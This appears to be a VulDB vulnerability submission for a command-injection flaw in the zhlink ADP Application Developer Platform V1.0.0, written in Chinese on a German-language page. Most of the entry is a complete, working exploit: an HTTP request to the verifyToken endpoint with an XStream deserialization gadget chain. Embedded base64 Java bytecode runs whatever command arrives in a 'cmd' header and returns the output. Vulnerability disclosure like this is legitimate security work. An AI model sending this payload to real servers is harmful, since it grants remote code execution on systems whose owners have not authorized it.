Submit #581277: 智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 Command Injectioninfo

Titel智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 Command Injection
Beschreibung漏洞地址:http://x.x.x.x:8082/adpweb/a/login 漏洞原理,存在Xstream反序列化漏洞,导致可命令执行,使用如下POC测试可执行命令: POST /adpweb/wechat/verifyToken/ HTTP/1.1 Host: x.x.x.x:8082 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Content-Type: text/xml cmd: ipconfig Content-Length: 7407 <java.util.PriorityQueue serialization="custom"> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class="org.apache.commons.beanutils.BeanComparator"> <property>outputProperties</property> <comparator class="java.lang.String$CaseInsensitiveComparator"/> </comparator> </default> <int>3</int> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <default> <__name>P</__name> <__bytecodes> <byte-array>yv66vgAAADEBCQEAH29yZy9hcGFjaGUvbG9nZ2luZy9mZS9GaWxlVXRpbHMHAAEBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwADAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBACFMb3JnL2FwYWNoZS9sb2dnaW5nL2ZlL0ZpbGVVdGlsczsMAAUABgoABAAMAQADcnVuDAAOAAYKAAIADwEAEGdldFJlcUhlYWRlck5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAA2NtZAgAEwEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcAFQEAE2phdmEvbGFuZy9FeGNlcHRpb24HABcBABNqYXZhL2xhbmcvVGhyb3dhYmxlBwAZAQAFdmFyMTUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEABXZhcjEzAQAFdmFyMTQBAAV2YXIxMgEACHJlc3BvbnNlAQASTGphdmEvbGFuZy9PYmplY3Q7AQAGd3JpdGVyAQAQTGphdmEvaW8vV3JpdGVyOwEABHZhcjcBABJMamF2YS9sYW5nL1N0cmluZzsBAAR2YXI2AQABSQEABHZhcjUBABVMamF2YS91dGlsL0FycmF5TGlzdDsBAAR2YXIzAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEABHZhcjQBAAR2YXIyAQAEdmFyMAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAEdmFyMQEAE1tMamF2YS9sYW5nL1RocmVhZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHADIHADEBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcANQEAEGphdmEvbGFuZy9PYmplY3QHADcBABNqYXZhL3V0aWwvQXJyYXlMaXN0BwA5AQAQamF2YS9sYW5nL1N0cmluZwcAOwEADVN0YWNrTWFwVGFibGUBABBqYXZhL2xhbmcvVGhyZWFkBwA+AQAKZ2V0VGhyZWFkcwgAQAEAD2phdmEvbGFuZy9DbGFzcwcAQgEAEltMamF2YS9sYW5nL0NsYXNzOwcARAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwARgBHCgBDAEgBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwASgBLCgAzAEwBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAE4ATwoAMwBQAQAHZ2V0TmFtZQwAUgASCgA/AFMBAARodHRwCABVAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMAFcAWAoAPABZAQAIQWNjZXB0b3IIAFsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsMAF0AXgoAOABfAQAGdGFyZ2V0CABhAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwAYwBkCgBDAGUKADYATAEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABoAGkKADYAagEACGVuZHBvaW50CABsAQAGdGhpcyQwCABuAQAHaGFuZGxlcggAcAEADWdldFN1cGVyY2xhc3MMAHIAXgoAQwBzAQAGZ2xvYmFsCAB1AQAOZ2V0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7DAB3AHgKAEMAeQEAIm9yZy5hcGFjaGUuY295b3RlLlJlcXVlc3RHcm91cEluZm8IAHsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHAH0BAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7DAB/AIAKAH4AgQoAQwBTAQAKcHJvY2Vzc29ycwgAhAEABHNpemUBAAMoKUkMAIYAhwoAOgCIAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABoAIoKADoAiwEAA3JlcQgAjQEAB2dldE5vdGUIAI8BABFqYXZhL2xhbmcvSW50ZWdlcgcAkQEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwwAkwCUCQCSAJUBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwwAlwCYCgCSAJkBAAlnZXRIZWFkZXIIAJsBAAlnZXRNZXRob2QMAJ0ARwoAQwCeDAARABIKAAIAoAEAC2dldFJlc3BvbnNlCACiAQAJZ2V0V3JpdGVyCACkAQAOamF2YS9pby9Xcml0ZXIHAKYBAARleGVjAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsMAKgAqQoAAgCqAQAFd3JpdGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMAKwArQoApwCuAQAFZmx1c2gMALAABgoApwCxAQAFY2xvc2UMALMABgoApwC0AQAHaXNMaW51eAEAAVoBAAZvc1R5cGUBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAmluAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQABcwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAAdleGVjUmVzAQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwcAugEAE2phdmEvaW8vSW5wdXRTdHJlYW0HAMMBABFqYXZhL3V0aWwvU2Nhbm5lcgcAxQEAB29zLm5hbWUIAMcBABBqYXZhL2xhbmcvU3lzdGVtBwDJAQALZ2V0UHJvcGVydHkMAMsAqQoAygDMAQALdG9Mb3dlckNhc2UMAM4AEgoAPADPAQADd2luCADRAQAHL2Jpbi9zaAgA0wEAAi1jCADVAQAHY21kLmV4ZQgA1wEAAi9jCADZAQARamF2YS9sYW5nL1J1bnRpbWUHANsBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DADdAN4KANwA3wEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMAKgA4QoA3ADiAQARamF2YS9sYW5nL1Byb2Nlc3MHAOQBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07DADmAOcKAOUA6AEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwABQDqCgDGAOsBAAJcYQgA7QEA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</byte-array> </__bytecodes> <__transletIndex>-1</__transletIndex> <__indentNumber>0</__indentNumber> </default> <boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/> </java.util.PriorityQueue> </java.util.PriorityQueue>
Quelle⚠️ http://x.x.x.x:8099/adpweb/wechat/verifyToken/
Benutzer
 Id3al (UID 85503)
Einreichung20.05.2025 02:55 (vor 11 Monaten)
Moderieren29.05.2025 10:34 (9 days later)
StatusAkzeptiert
VulDB Eintrag310496 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 verifyToken erweiterte Rechte]
Punkte20

Might our Artificial Intelligence support you?

Check our Alexa App!